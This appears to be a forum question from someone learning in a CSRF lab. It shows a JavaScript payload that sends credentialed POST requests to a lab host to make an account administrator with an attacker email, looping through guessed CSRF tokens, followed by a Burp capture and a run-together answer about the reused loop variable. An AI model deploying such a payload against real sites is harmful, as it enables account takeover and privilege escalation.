I'm working on a CSRF lab and trying to iterate through 20+ tokens.
<script>
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.withCredentials = true;
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest.call();
};
</script>
I'm using +token[i]+ to insert the token into the csrf param, but viewing the request(s) in Burp, it seems to be "undefined":
POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0
username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=
What am I getting wrong here? I'm still new to JavaScript so maybe +token[i]+ isn't the proper way to do this?
functionand change your code to usefetchinstead of XHR.for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);tofor (var b = 0; b < aBody.length; b++) aBody[b] = body.charCodeAt(b);